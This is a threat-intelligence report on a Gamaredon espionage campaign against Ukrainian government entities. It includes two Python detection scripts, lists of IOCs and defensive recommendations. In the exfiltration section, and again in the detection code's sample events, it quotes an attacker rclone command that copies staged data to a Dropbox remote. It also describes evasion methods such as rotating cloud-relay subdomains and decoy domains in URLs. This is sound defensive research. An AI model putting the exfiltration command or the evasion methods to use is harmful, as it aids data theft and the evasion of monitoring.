APT-C-53 (Gamaredon): Attack Campaign Targeting Ukrainian Government Entities

Executive Summary

The Russian state-sponsored threat group APT-C-53 (Gamaredon), active since 2013, continues its espionage operations against Ukrainian governmental and military institutions.

In 2025 its campaigns have added rapid migration of command-and-control (C2) infrastructure onto legitimate cloud services (Microsoft Dev Tunnels, Cloudflare Workers) and payload obfuscation aimed at defeating static detection.

The attack chain relies on stealthy PowerShell and VBScript payloads, registry-based persistence, and Dropbox as a data exfiltration channel.
Indicators of Compromise (IOCs) include multiple C2 domains, disposable Cloudflare subdomains, and several MD5 file hashes.

Primary source: 360 Threat Intelligence Center (360高级威胁研究院).
Secondary source: republication via CN-SEC.com.

Background

Gamaredon, also known as Primitive Bear, Winterflounder, and BlueAlpha, has consistently targeted Ukraine with intelligence-gathering and espionage campaigns for over a decade.
In September 2025, researchers from the 360 Threat Intelligence Center observed a new wave of activity, marked by the abuse of trusted cloud services to disguise both the malicious infrastructure and the exfiltration channel.

Tactics and Techniques

1. Dynamic C2 Migration

  • Initial infrastructure hosted on platforms such as Telegram Telegraph.
  • Transition to Microsoft Dev Tunnels, generating temporary subdomains under *.devtunnels.ms with valid TLS certificates issued by Microsoft.
  • Allow-listed domain camouflage: trusted domain names (e.g., wise.com, megamarket.ua) are embedded in the malicious URLs so that controls and analysts keying on the visible trusted name let the request through.

Attacker advantages:

  • Real C2 IP addresses hidden behind Microsoft relays.
  • Subdomain rotation capability in minutes to hours.
  • Malicious traffic blended with legitimate HTTPS traffic.

2. Abuse of Cloud Services for Payload Delivery

  • Cloudflare Workers leveraged to deliver malware.
  • Automated generation of short-lived subdomains (≤ 48 hours).
  • Two-stage delivery process:
    • Stage 1: payload delivery through rotating Cloudflare Workers subdomains.
    • Stage 2: execution of a VBScript dropped into %TEMP% with randomized names (tmpXXXX.tmp.vbs).
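A network-side detection sketch for the relay and decoy patterns in sections 1 and 2, added here as an example and not part of the 360 report or the CN-SEC republication. It scans proxy log lines for Dev Tunnels and workers.dev hosts and for the three .ru C2 domains from the IOC list, flags URLs whose path carries a trusted domain name on an untrusted host, and reports workers.dev accounts that served more than one subdomain inside a 48-hour window (the rotation behaviour described above). The log format, client addresses, timestamps and the Dev Tunnels host name are constructed; only the workers.dev hosts, .ru domains and decoy domains come from the report.

```python
"""Network-side detection for the cloud-relay patterns above (added example; see lead-in)."""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Values taken from the report's IOC list and decoy examples.
C2_DOMAINS = {"litanq.ru", "fulagam.ru", "bulam.ru"}
RELAY_SUFFIXES = (".devtunnels.ms", ".workers.dev")  # any tenant or region, not only *.euw.devtunnels.ms
DECOY_DOMAINS = {"wise.com", "megamarket.ua"}

# Constructed proxy log: "<ISO timestamp> <client IP> <host> <URL>" (hypothetical format).
# Client IPs, timestamps and the Dev Tunnels host name are made up; the other hosts are from the IOC list.
SAMPLE_LOG = """\
2025-09-03T08:01:12 10.0.0.15 dvofiuao.3150wild.workers.dev https://dvofiuao.3150wild.workers.dev/wise.com/update
2025-09-03T08:02:40 10.0.0.15 tskqbu.bronzevere.workers.dev https://tskqbu.bronzevere.workers.dev/megamarket.ua/
2025-09-03T09:15:05 10.0.0.22 www.wise.com https://www.wise.com/
2025-09-04T11:30:00 10.0.0.15 bdslmtlqh.bronzevere.workers.dev https://bdslmtlqh.bronzevere.workers.dev/a
2025-09-04T12:00:00 10.0.0.15 abcd1234-8080.euw.devtunnels.ms https://abcd1234-8080.euw.devtunnels.ms/
2025-09-04T12:05:00 10.0.0.31 litanq.ru http://litanq.ru/x
2025-09-04T13:00:00 10.0.0.40 dev-portal.example.com https://dev-portal.example.com/
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def classify_host(host: str) -> str | None:
    """'c2' for the listed .ru domains (and subdomains), 'relay' for cloud relays, else None."""
    host = host.lower().rstrip(".")
    if host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS):
        return "c2"
    if host.endswith(RELAY_SUFFIXES):
        return "relay"
    return None


def decoy_in_path(url: str) -> str | None:
    """Return a trusted domain name that appears in the URL path while the host is not that domain."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    path = parsed.path.lower()
    for d in DECOY_DOMAINS:
        if d in path and not (host == d or host.endswith("." + d)):
            return d
    return None


def workers_account(host: str) -> str | None:
    """'tskqbu.bronzevere.workers.dev' -> 'bronzevere' (the account label under workers.dev)."""
    labels = host.lower().split(".")
    if len(labels) >= 4 and labels[-2:] == ["workers", "dev"]:
        return labels[-3]
    return None


def scan(log_text: str) -> list[dict]:
    """One alert per log line that hits a C2 domain, a cloud relay, or a decoy-in-path URL."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, host, url = m.groups()
        kind = classify_host(host)
        decoy = decoy_in_path(url)
        if kind is None and decoy is None:
            continue
        alerts.append({"ts": datetime.fromisoformat(ts), "client": client, "host": host,
                       "kind": kind or "decoy", "decoy": decoy})
    return alerts


def rotating_accounts(alerts: list[dict], window_hours: int = 48) -> dict[str, set[str]]:
    """workers.dev accounts that served two or more distinct subdomains within window_hours."""
    seen: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    for a in alerts:
        acct = workers_account(a["host"])
        if acct:
            seen[acct].append((a["ts"], a["host"]))
    result = {}
    for acct, items in seen.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            hosts = {h for t, h in items[i:] if (t - t0).total_seconds() <= window_hours * 3600}
            if len(hosts) >= 2:
                result[acct] = hosts
                break
    return result


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts'].isoformat()} {a['client']} {a['kind']:<5} {a['host']} decoy={a['decoy']}")
    print("rotating workers.dev accounts:", rotating_accounts(found))
```

The per-account rotation check is the part worth carrying into a SIEM: a single workers.dev hit is common in developer traffic, but one account handing out several short-lived subdomains to the same client inside two days matches the delivery pattern described above and is rare in legitimate use.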

3. Persistence and Stealth Execution

  • Registry-based persistence: HKCU:\System\*.
  • Dynamic PowerShell compilation to evade static detection.
  • Temporary files disguised as Microsoft Office artifacts (%localappdata%\Winwordini.DAT) used as staging areas before exfiltration.

4. Data Exfiltration

  • Use of rclone.exe to synchronize stolen data with an attacker-controlled Dropbox repository.
  • Example command: rclone.exe copy %UserProfile%\AppData\Local\Temp\1750756392913 dropbox:DP27-KA-000422_585516477/
  • Transfers are TLS-encrypted and terminate at Dropbox's own infrastructure, so they blend with legitimate Dropbox traffic and resist content inspection.
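A host-side counterpart covering sections 3 and 4, added here as an example and not code from the 360 report: five rules run over Sysmon-style process, file and registry events and flag a script host running a tmp*.tmp.vbs file from %TEMP%, PowerShell spawned by that script host with an encoded command or run-time compilation, a value written under HKCU\System, creation of %localappdata%\Winwordini.DAT, and rclone.exe pushing a %TEMP% directory to a dropbox: remote. The events are constructed; the paths, value names and the rclone command line follow the report, while the user name, SID, Base64 payload and the reading of "dynamic PowerShell compilation" as -enc / Add-Type / reflective loads are assumptions.

```python
"""Host-side detection rules for the persistence and exfiltration tradecraft above (added example; see lead-in)."""
from __future__ import annotations

import json
import re

# Constructed Sysmon-style events (1 = process create, 11 = file create, 13 = registry value set).
# Paths and value names follow the report; the user name, SID and Base64 payload are made up.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\Users\olena\AppData\Local\Temp\tmpA3F9.tmp.vbs'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\System\upd",
     "Details": r"wscript.exe //B C:\Users\olena\AppData\Local\Temp\tmpA3F9.tmp.vbs"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\olena\AppData\Local\Winwordini.DAT"},
    {"EventID": 1, "Image": r"C:\Users\olena\AppData\Local\Temp\rclone.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"rclone.exe copy C:\Users\olena\AppData\Local\Temp\1750756392913 dropbox:DP27-KA-000422_585516477/"},
    {"EventID": 1, "Image": r"C:\Program Files\rclone\rclone.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rclone.exe sync D:\backups s3:corp-backups"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},
])

TEMP_VBS = re.compile(r"\\AppData\\Local\\Temp\\tmp\w+\.tmp\.vbs\b", re.I)
# HKCU shows up as HKU\<SID> in Sysmon; accept both spellings of the hive.
HKCU_SYSTEM = re.compile(r"^(HKCU|HKEY_CURRENT_USER|HKU\\S-1-5-21-[\d-]+)\\System\\", re.I)
# The report only says "dynamic PowerShell compilation"; reading that as encoded commands,
# Add-Type or reflective assembly loads is an assumption of this example.
DYNAMIC_PS = re.compile(r"(\s-e(nc|ncodedcommand)?\s|Add-Type|\[Reflection\.Assembly\]::Load)", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rclone_remote(cmdline: str) -> tuple[str, str] | None:
    """(remote, path) for the first rclone remote argument; drive letters and flags are skipped."""
    for tok in cmdline.split()[1:]:
        if tok.startswith("-"):
            continue
        name, sep, rest = tok.partition(":")
        if sep and name and not re.fullmatch(r"[A-Za-z]", name):
            return name.lower(), rest
    return None


def rule_temp_vbs(ev):
    if ev.get("EventID") == 1 and image_name(ev.get("Image", "")) in SCRIPT_HOSTS \
            and TEMP_VBS.search(ev.get("CommandLine", "")):
        return "script_host_runs_temp_vbs", "high"


def rule_dynamic_ps(ev):
    if ev.get("EventID") == 1 and image_name(ev.get("Image", "")) in {"powershell.exe", "pwsh.exe"} \
            and image_name(ev.get("ParentImage", "")) in SCRIPT_HOSTS \
            and DYNAMIC_PS.search(ev.get("CommandLine", "")):
        return "powershell_from_script_host", "medium"


def rule_registry(ev):
    if ev.get("EventID") == 13 and HKCU_SYSTEM.match(ev.get("TargetObject", "")):
        return "hkcu_system_persistence", "high"


def rule_staging(ev):
    if ev.get("EventID") == 11 and ev.get("TargetFilename", "").lower().endswith(r"\appdata\local\winwordini.dat"):
        return "office_lookalike_staging_file", "medium"


def rule_rclone(ev):
    if ev.get("EventID") != 1 or image_name(ev.get("Image", "")) != "rclone.exe":
        return None
    cmd = ev.get("CommandLine", "")
    remote = rclone_remote(cmd)
    if remote is None:
        return None
    from_temp = re.search(r"\\AppData\\Local\\Temp\\", cmd, re.I) is not None
    # Any rclone run is worth logging; a %TEMP% directory going to a Dropbox remote is the reported pattern.
    severity = "high" if remote[0] == "dropbox" and from_temp else "low"
    return "rclone_to_cloud_remote", severity


RULES = (rule_temp_vbs, rule_dynamic_ps, rule_registry, rule_staging, rule_rclone)


def detect(events_text: str) -> list[dict]:
    """Run every rule over each JSON event line and return the alerts in event order."""
    alerts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append({"rule": hit[0], "severity": hit[1], "event": ev})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        what = a["event"].get("CommandLine") or a["event"].get("TargetObject") or a["event"].get("TargetFilename")
        print(f"[{a['severity']:>6}] {a['rule']}: {what}")
```

The rules are deliberately narrow: a value under HKCU\System is flagged regardless of content because that hive path has no legitimate user-mode persistence role, while rclone is only raised to high when both halves of the reported command (a %TEMP% source and a dropbox: remote) are present, so administrators' own rclone backups stay at low.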

Attribution

The following factors support attribution to APT-C-53 (Gamaredon):

  • Reuse of known infrastructure and techniques.
  • Documented reliance on domain shadowing and cloud service abuse.
  • Persistent focus on Ukrainian government institutions.
  • Infrastructure ties to Russian domains (.ru).

Indicators of Compromise (IOCs)

C2 Domains and Malicious Relays

litanq[.]ru
fulagam[.]ru
bulam[.]ru
*.euw.devtunnels[.]ms
dvofiuao.3150wild.workers[.]dev
tskqbu.bronzevere.workers[.]dev
bdslmtlqh.bronzevere.workers[.]dev
jqrwbrbj.bronzevere.workers[.]dev
khycpsgbu.previoussusanna.workers[.]dev
oexvrm.embarrassed3627.workers[.]dev
xuwj.goldjan.workers[.]dev
gohiz.griercrimson.workers[.]dev

MD5 Hashes

98b540aeb2e2350f74ad36ddb4d3f66f
0459531e3cbc84ede6a1a75846a87495
f3deebe705478ec1a4ec5538ac3669cb
67896b57a4dcf614fb22283c130ab78b
d2c551812c751332b74b0517e76909f2
9258a427c782cd8d7dcf25dc0d661239
023429e53d32fa29e4c7060c8f3d37db

Defense Recommendations

  • Email security hardening: advanced filtering to block malicious attachments (LNK, archives).
  • System and registry monitoring: track suspicious entries in HKCU:\System and monitor PowerShell logs.
  • Endpoint security: deploy and maintain EDR capable of detecting fileless malware.
  • Network surveillance: monitor anomalous traffic to Dev Tunnels and Cloudflare Workers.
  • Control third-party tool usage: restrict unauthorized use of rclone.exe for data transfers.

Sources

Key points about the sources used:

CN-SEC.com is a Chinese website that serves as a community platform for cybersecurity threat intelligence. It features:

  • translations or republications of technical articles from other sources (research blogs, vendor bulletins, threat intelligence team publications),
  • original analyses written by Chinese researchers,
  • contributions from local offensive and defensive security communities.

It is therefore primarily an aggregator and relay of technical content, widely followed in Asia, but not necessarily the primary source of the reports. In our case, the article on APT-C-53 (Gamaredon) is in fact a republication of an analysis originally produced by the 360 Threat Intelligence Center (360高级威胁研究院), the advanced research unit of Qihoo 360, a major player in cybersecurity in China.

In summary on source qualification:

  • CN-SEC.com = Chinese security-oriented community site that republishes or centralizes technical content.
  • Primary source = 360 Threat Intelligence Center, which published this analysis on September 7, 2025, on its official account (WeChat / blog).